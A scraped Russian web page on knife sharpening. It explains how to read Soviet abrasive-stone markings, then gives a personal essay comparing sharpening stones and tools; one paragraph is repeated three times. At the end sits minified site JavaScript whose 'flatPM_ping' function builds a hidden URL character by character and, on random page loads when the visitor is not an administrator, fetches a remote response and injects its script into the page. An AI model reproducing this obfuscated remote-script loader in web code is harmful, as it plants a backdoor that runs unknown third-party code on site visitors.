2. Зернистость . Размер зерна определяет съем металла — чем выше номер, тем сильнее «дерет». Крупная зернистость — грубая точка, интенсивный съем металла — от 200 до 63. Заточка предварительная — средняя и мелкая зернистость — 50–16, окончательная — 16–25. Доводочные операции — самым мелким абразивом — от 12 до 4. Полировка микрошлифпорошками от М63 до М5 (буква М означает «микро»: М40 более крупное зерно чем М20, например).

После зернистости в маркировки обычных абразивов стоят буквы, показывающие содержание основной фракции (чем больше ее, тем брусок «однороднее») — В (высокое), П (повышенное), Н (нормальное), Д (допустимое)

3. Твердость определяет стадию точки. Как правило мягкие абразива используют при грубой точке, средние — доводке, а твердые — правке, но вполне допустимо иметь бруски одной твердости — среднемягкие (СМ1, СМ2), средние (С1, С2) или среднетвердые (СТ1, СТ2, СТ3). Цифра после букв говорит о твердости абразива — чем больше число, тем меньше пор и тем плотнее (или более износостойко) абразиво.

Есть еще тип структуры, который пишется после твердости (ищите 7 -10), и связки — бакелитовая (очень распространена) и керамическая (рекомендую именно ее, но это дефицит) и пр, но это уже тонкости. Вам вполне хватит трех камней (на первых порах)

1. Крупнозернистого среднемягкого на основе карбида кремния — грубая точка, правка спусков.
2 Со средним или мелким зерном корунд нормальный средний — среднетвердый — точка (основная стадия).
3. Брусок мелкозернистого электрокорунда (бывают белые, зеленые, коричневые) — для доводки и правки. Известны под названием «изделие Кромка» и больше напоминают не абразиво, а неглазированную керамику.

Хромистые пасты ГОИ делятся на 3 основные группы (по размеру шлифзерна):

грубые (маркировка 50, 45, 40, 35, 30, 25, 20);
средние (15 и 10);
тонкие (7, 4 и 1)

Они все зеленого цвета, что обусловлено их хромистой основой. Проверять или по маркировке (обычно на брусок пасты клеят бумажку с данными) либо эмпирическим способом, связанным с визуальной оценкой шероховатости поверхности (стекло или металл) после 5–7 мин. притирки.

Автор: Александр Марьянко

вот наглядный пример:

24A М28 П БКв25.150
СТ112 КА ГОСТ 2456-82

24A — как уже было сказано, тип абразива

По физическому и химическому составу более однороден, имеет более высокую твердость и острые кромки, обладает лучшей самозатачиваемостью и обеспечивает меньшую шероховатость обрабатываемой поверхности по сравнению с электрокорундом нормальным.

Предназначен для изготовления шлифовальных кругов и брусков из шлифзерна и шлифпорошков на всех связках для чистовой обработки закаленных стальных деталей.

M28 — размер абразивного зерна = 28 микрон

П — повышенное содержание основной фракции абразивного зерна

Однородность зернового состава, существенно влияющая на шероховатость обрабатываемой поверхности, режущие свойства и стойкость инструмента, характеризуется процентным содержанием основной фракции. Поэтому условное обозначение зернистости дополняют буквенным индексом, соответствующим этому процентному содержанию: В — высокое; П — повышенное; Н — номинальное; Д — допустимое.

БКв25.150 — типоразмер: БрусоК кВадратного сечения, со стороной квадрата 25мм, длина бруска 150мм

СТ112 — твердость и структура связки

СТ1 — Среднетвердый (СТ), Круглое и бесцентровое врезное шлифование, профильное шлифование, обработка разобщенных поверхностей, обдирочное шлифование чугунов

12 — номер стуктуры 12, в данном случае открытая структура.
Чем больше номер структуры, тем больше расстояние между зернами,
т. е. структура более открытая.

КА — тип связки, в данном случае это керамическая связка, она обладает высокой огнеупорностью, водостойкостью, химической стойкостью, хорошо сохраняет профиль рабочей кромки, круга, но чувствительна к ударным и изгибающим нагрузкам. Применяют плавящиеся и спекающиеся керамические связки. Абразивный инструмент из электрокорунда изготовляют на плавящихся связках, а из карбида кремния — на спекающихся.

ГОСТ 2456-82 — государственный стандарт, которому соответствует изделие
(ГОСТ 2456-82 «Бруски шлифовальные. Технические условия.» от 1982г. ) распространяется на бруски шлифовальные на керамической и бакелитовой связках полный текст этого стандарта есть вот тут: http://gost4yuo.ru/load/1-1-0-1146

клеймо на этом бруске: Рижский абразивный завод

буква R в центре и контуры башен, символизирующий Ригу с ее архитектурой. все остальное изображает сегментный абразивный инструмент.

Кому интересна маркировка абразивов, вот тут http://tsn-masterskaya.narod.ru/Abrazivnye_materialy_i_instrument.htm
есть практически исчерпывающая информация.

Свойства абразивов используемых в абразивных брусках

Маркировка
_________________________________________________________________

Если пойти за брусками на блошиный рынок (самый простой способ купить хоть что-нибудь стоящее) велика вероятность встретить бруски отечественного производителя, причем сделанные в СССР.

1 — эмблема завода изготовителя;
2 — тип: БП — брусок прямоугольный;
3 — размер бруска: 25х16х150;
4 — абразивный материал: 25А — электрокорунд белый;
5 — зернистость: 18 — 200…160 мкм;
6 — минимальное процентное содержание основной фракции: П — повышенное;
7 — твердость абразивного инструмента: СТ1 — среднетвердая степень твердости;
8 — структура (степень сближения абразивных зерен): 8;
9 — связка: К — керамическая;
10 — класс точности: Б;
11 — стандарт которому удовлетворяет брусок: ГОСТ 2456-82.

1 — эмблема завода изготовителя;
2 — абразивный материал: 64С — карбид кремния зеленый;
3 — зернистость: 6 — 80…63 мкм;
4 — минимальное процентное содержание основной фракции: П — повышенное;
5 — твердость абразивного инструмента: СТ1 — среднетвердая степень твердости;
6 — структура (степени сближения абразивных зерен): 8;
7 — связка: К — керамическая;
8 — класс точности: А;
9 — стандарт которому удовлетворяет брусок: ГОСТ 2456-82;
10 — тип: БКв — брусок квадратный;
11 — размер бруска: 20х150.

1 — эмблема завода изготовителя;
2 — абразивный материал: 64С — карбид кремния зеленый;
3 — зернистость: М28 — 28…20 мкм;
4 — минимальное процентное содержание основной фракции: П — повышенное;
5 — тип: БП — брусок прямоугольный;
6 — размер бруска: 25.16.150 — 25х16х150;
7 — твердость абразивного инструмента: СТ2 — среднетвердая степень твердости;
8 — структура (степени сближения абразивных зерен): 10;
9 — связка: К — керамическая;
10 — документ которому удовлетворяет брусок: ТУ 2-…;
11 — государственный знак качества СССР.

1 — эмблема завода изготовителя;
2 — тип: БТ — брусок треугольный;
3 — размер бруска: 16х150;
4 — абразивный материал: 25А — электрокорунд белый;
5 — зернистость: 6 — 80…63 мкм;
6 — минимальное процентное содержание основной фракции: П — повышенное;
7 — твердость абразивного инструмента: СТ1 — среднетвердая степень твердости;
8 — структура (степень сближения абразивных зерен): 9;
9 — связка: К — керамическая;
10 — класс точности: Б;
11 — стандарт которому удовлетворяет брусок: ГОСТ 2456-82.

Добавить комментарий Отменить ответ

Для отправки комментария вам необходимо авторизоваться.

Секреты точильного камня

Процесс затупления ножа неизбежен. Даже если вы им активно не пользуетесь и лишь изредка достаете из ножен, чтобы показать друзьям, все равно режущая кромка от контакта с ножнами, тупится, не сильно, но неизбежно.

Процесс затупления ножа неизбежен. Даже если вы им активно не пользуетесь и лишь изредка достаете из ножен, чтобы показать друзьям, все равно режущая кромка от контакта с ножнами, тупится, не сильно, но неизбежно.

Можно долго изучать и сравнивать разные марки стали, технологии их производства, закалку. Все это здорово, но. Ни один нож не будет выполнять свои функции, если он тупой. и если еще вчера он вас радовал своей бритвенной остротой, то сегодня его нужно точить или хотя бы подправлять.

Процесс затупления ножа неизбежен. Даже если вы им активно не пользуетесь и лишь изредка достаете из ножен, чтобы показать друзьям, все равно режущая кромка от контакта с ножнами, тупится, не сильно, но неизбежно. И вот настает извечный российский вопрос: «Что делать?» Можно отнести в киоск «Точу ножи, ножницы, бритвы правлю» где-нибудь у базара (в провинции я такие видел практически в каждом городе). Но вид небритого «дяди Васи», дышащего на вас перегаром и пытающегося провести заскорузлым пальцем по лезвию, явно отбивает всякое желание не только отдать ему в руки нож стоимостью несколько сотен «зеленых», но и доверить даже ржавый колун. А случайно заглянув в окошко этого заведения, по недоразумению названного гордым именем «мастерская», и увидев в сумраке помещения огромный точильный станок с камнем диаметром в полметра, зернистость которого видна даже с расстояния двух метров, понимаешь, что на таком оборудовании точить можно только якоря с небольшой баржи.

Я в молодости после третьего курса института проходил практику в штамповочном цехе завода по производству комбайнов. Здесь точильных станков не было, и я пошел к приятелям с факультета обработки металлов в токарный цех, чтобы наточить любимый складной ножичек с рукояткой в форме попугая. По сравнению с современными ножами, он, конечно, ничего собой не представлял, но тогда этот ножичек мне очень нравился, и я им дорожил. Так вот, пришел я его поточить, мне указали, где стояло точило, на котором затачивали твердосплавные резцы.

Включил я станок, обороты жуткие, меня чуть ветром не сносило от вращения камня (это я, конечно, утрирую немного). Не успел я поднести лезвие к точильному камню, «вжик» — и в руках у меня одна рукоятка и пара миллиметров оставшегося клинка. Хорошо, что пальцы остались целы! Так я поучился точить на станках ножи. Много воды утекло с тех пор, и арсенал клинков количественно и, главное, качественно у меня изменился, и точильных камней разных фирм приобрел немалое количество. О них и хочу я вам поведать.

Точильные камни бывают натуральные и искусственные. К натуральным относят Вашиту и Арканзас, к искусственным все остальные (алюминиевую керамику, алмазные. ). Кроме того, камни условно подразделяются на водные и масляные. Что это значит? А это значит, что перед использованием одни камни нужно замачивать в воде 10-15 мин, на другие достаточно капнуть капельку специального масла. Смысл этих манипуляций прост, и не надо из этого делать шаманства и танцев с бубном, что я встречал у некоторых авторов. Тайного смысла тут нет, просто нужно четко представлять, из чего состоит процесс.

Абразивное зерно в натуральных камнях связано между собой более мелким зерном, в искусственных камнях абразивное зерно держится на клеевой связке. В японских камнях Naniwa связку традиционно делают более мягкой, чем в европейских, но это еще зависит от серии: в Corase stones и Super stones связка более вязкая и жесткая по сравнению с серией Media, Economical. Смазка нужна для того, чтобы промежутки между зернами не забивались, то есть камень точильный не заглянцовывался стальными опилками.

Теоретически процесс заточки прост, как «колумбово яйцо»: берешь нож и плавно проводишь режущей кромкой по точильному бруску, плоскость ножа держишь под определенным углом к камню. Но вот тут-то для новичков лежит «подводный камень»! Поскольку клинки в большинстве своем не просто прямая полоска стали, а имеют зачастую изогнутый профиль, угол нужно держать постоянным, а наклон лезвия менять. Но все приходит с опытом, для новичков же выпускаются разные приспособления — от простеньких до достаточно сложных и дорогих. К примеру, камень фирмы Naniwa Combo 1000/3000 серии Economical комплектуется простеньким держателем угла, а мой любимый и недешевый прибор для восстановления угла Lansky позволяет не только восстановить утраченный при неоднократных заточках угол жала клинка, но и изменять этот угол. На приборе нанесена соответствующая маркировка: 17′, 20′, 30′, в комплект входят пять камней с различной зернистостью для полировки режущей кромки и натуральное масло. Вот мы подошли и к масляным камням.

Доморощенные «специалисты» имеют особое мнение, дескать, фирменное масло для заточки ножей — это все ерунда, можно любым маслом пользоваться, в том числе и нейтральным оружейным, и WD-40. Да, можно, конечно, но только клинок потом нужно отмывать полчаса моющим средством для посуды. Иначе эту же химию вы будете кушать вместе с теми продуктами, которые режете этим ножом. Может, кому-то и все равно, а мне как-то не хочется, чтобы печень отвалилась через некоторое время.

Ближайший конкурент прибора Lansky Crock Stick — это Spyderco Tri-Angle, конструкция которого состоит из пластиковой подставки и двух пар камней разной зернистости, которые вставляются вертикально в подставку и составляют рабочими поверхностями V-образную щель между камнями. Лезвие ножа проводят от рукояти до кончика, при этом перемещая клинок сверху вниз и на себя. На мой субъективный взгляд, чисто дилетантское приспособление, которое стоит немалых денег, а дает минимальную пользу.

Такое мнение сложилось из того, что качественную заточку произвести практически невозможно, можно лишь слегка подправить кромку, а при неосторожном движении и вовсе испортить ее. Так что кажущаяся привлекательность этого прибора весьма сомнительна. В походных условиях весьма неплохо зарекомендовал себя алмазный брусок. У меня он еще советского времени выпуска, как написано на невзрачной упаковке, для правки опасных бритв. Это небольшой брусок 30×10 × 100 мм из алюминия с напылением около 2 мм алмазной крошки; подобную конструкцию имеют и фирменные точилки (например Lansky Double-Sided Folding Diamond). Они более компактны, пластиковый чехол при раскладывании становится удобной ручкой, но напыление алмазного абразива всего несколько микрон, изнашиваются достаточно быстро, а стоят несоизмеримо дороже нашего камня. На алмазном камне подточить лезвие можно достаточно быстро.

К сожалению, то, что быстро точится, так же быстро и тупится. Смысл тут прост: алмаз формирует агрессивную режущую кромку с более высокими и крупными вершинками (собственно, они и режут материал), но они и быстрее выкрашиваются, а следствие — затупление режущей кромки. Водные же камни с мелким абразивным зерном формируют соответственно и более мелкие вершинки кромки и выкрашиваются медленнее, поэтому режущая кромка долго не затупляется. Точно такой же результат дает камень из натурального Арканзаса, и поэтому останавливаться на нем я не буду.

Твердый Арканзас у меня был от фирмы Boker, и мне он совершенно не понравился, не смог я к нему приноровиться. Это не значит, что он плохой, просто к моему стилю заточки он не подошел. А вот мягкий камень от фирмы Norton в комплекте со специальным маслом для заточки той же фирмы живет у меня до сих пор, и пользуюсь я им с неизменным удовольствием. Из довольно большого разнообразия точильных камней я формирую комплект для каждого конкретного случая.

Если я отправляюсь на однодневную охоту по перу, то беру легкую и компактную двухстороннюю точилку Spyderco, этого достаточно, чтобы в полевых условиях подправить клинок, более серьезную заточку можно и дома при надобности провести. На зверовую охоту беру алмазный брусок, шкура у кабана, а главное, его щетина вкупе с песком и грязью, в которой он валялся, затупляет клинок намного быстрее, чем, скажем, шкура лося. Мне заточки ножа в среднем хватает на разделку двух кабанчиков (на самом деле тут масса факторов, влияющих на конечный результат: марка стали, ее закалка, угол заточки, размер кабана. ). Всю основательную заточку делаю дома в спокойной обстановке, не спеша и не отвлекаясь. И хотя я и упоминал об отсутствии таинства при заточке, все же это действо сродни медитации: клинок вперед, назад, вжик-вжик. Не знаю, как вас, но меня этот процесс завораживает и успокаивает. Чем больше размеры клинка, тем большего размера следует выбирать и камень — удобнее точить. И совсем здорово, если в комплект камня входит
препятствующая скольжению подставка. На моих японских камнях Naniwa она есть, на двустороннем Economical 1000/3000 она из формованной резины. А вот Naniwa Super 10000 на пластиковой подставке с резиновыми вставками закреплен неподвижно.

Как-то в одном солидном охотничьем журнале я прочитал статью про заточку ножей. Автор рекомендовал перед заточкой взять газету, намочить ее, положить на стол, а уже на нее точильный камень, тогда, дескать, камень не будет скользить по поверхности стола. На свою беду я решил попробовать сей опыт. Да, камень не скользит по столу, и мокрая газета прилипла к нему, все вроде здорово. Но какой скандал закатила мне моя благоверная, после того как газету я отодрал от крышки стола, на которой можно было читать передовицу местного печатного органа! Я минут сорок с тряпкой и моющими средствами оттирал это безобразие под неумолкаемый шепот супруги, переходящий порой в шипение.

Но вернемся к нашим баранам, то бишь к точильным брускам из Страны восходящего солнца. При пользовании ими есть маленький нюансик: замачивать-то их, конечно, в воде надо, но вот в чем изюминка: когда брусок вынут из емкости, в которой он отмокал минут этак 10-15, надо выждать некоторое время, чтобы влага впиталась, а поверхность бруска осталась влажной, но не сырой, в этот момент камень становится наиболее агрессивным по отношению к клинку и врезается в металл с максимальной эффективностью. Если на рабочей поверхности будет стоять вода, брусок точит лезвие хуже и изнашивается быстрее. Когда я первый раз точил, то подумал: «Э, брат, так тебя надолго не хватит!» Но потом уловил момент, и все встало на свои места. Поскольку зернистость абразива очень мелкая, то и очень быстро заглянцовывается рабочая поверхность. Во время заточки я несколько раз промываю брусок под струей проточной воды с губкой и моющим средством для ванн.

После окончания заточных операций брусок промываю опять и сушу в вертикальном положении, чтобы доступ воздуха был со всех сторон. В последнее время арсенал моих клинков пополнился ножами с серейторной и полусерейторной заточкой. Сначала я их покупал ради интереса, но с некоторой долей скепсиса, а потом они мне настолько понравились, что сомнений при очередной покупке не вызывают. Но тут возник вопрос, как и чем править и подтачивать их волнистую режущую кромку? У разных фирм-производителей профиль серейтора разный, поэтому выбор пал на универсальные абразивные камни, позволяющие приспособиться к любой форме серейтора. Как всякое новое дело, первоначально получалось довольно коряво, но при соответствующей практике все вышло замечательно. Под заточку серейтора я пользуюсь тремя видами камней: набор Spyderco — два бруска разной зернистости и камень от Lansky с каплеобразным сечением. Все три камня из алюминиевой керамики, очень удобные и эффективные.

Об эффективности разных камней

Раньше в подавляющей массе клинки выпускались небольшой или средней твердости, в пределах 54-56 HRC, и точились, и правились практически любыми точильными камнями без проблем. В настоящее время высококлассные ножи выпускаются из экзотических сортов сталей. Даже известные и популярные сорта сталей выпускают с применением новейших современных технологий, отсюда твердость и износостойкость их становится все выше и выше, порядка 58-62 HRC. И это здорово. Но ножи с такой твердостью точить на натуральных камнях (Арканзас) несколько затруднительно. Почему? Потому, что твердость абразивного материала должна быть тверже, чем сталь клинка.

Вот что я нашел в литературе. Оказывается, у абразивных точильных камней существует своя шкала твердости — твердости минералов по Моосу. Стали клинков обычно обладают твердостью 5,0-6,5, а алмаз 10,0, но алмаз самый твердый материал, а у натуральных камней значение твердости 6,5-7,2. Если твердость клинка приближается или равна твердости абразива, путного ничего не получается. Клинок скользит по поверхности точильного бруска без должного эффекта. И нам, простым потребителям, приходится еще раскошеливаться на достаточно дорогие точильные камни, но, впрочем, кто считает потраченные деньги, когда дело касается наших увлечений? Тут уж если имеешь в арсенале высококлассные клинки, то и точилки к ним приходится такого же класса подбирать, иначе и быть не может.

А вывод из всего сказанного такой: если клинок твердостью 54-56 HRC, то подойдет любая точилка или абразивный брусок, а если 58-62 HRC, то я рекомендую (исходя из своего субъективного опыта) обратить внимание на японские водные камни фирмы Naniwa зернистостью 1000/3000, 4000, 10000, серий Economical, Super, Finishing. На данный момент я лучше абразива для домашнего использования не встречал, а перепробовал много, уж поверьте мне на слово. А для походных условий наилучший (на данный момент) Spyderco Pocket Stones Fine & Medium или Lansky Double-Sided Folding Diamond Sharpening Paddles.

А если вам вдруг покажется, что в магазине слишком дорого стоит хороший точильный камень, вспомните «дядю Васю» из киоска «Точу ножи, ножницы и бритвы правлю». Поверьте, вам сразу полегчает, потому что лучше потратить деньги на действительно нужную и классную вещь, чем корить потом себя за то, что доверил свой любимый клинок неизвестно кому и получил, к сожалению, известно что. Ибо сказано давно и не мной: «Скупой платит дважды».

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика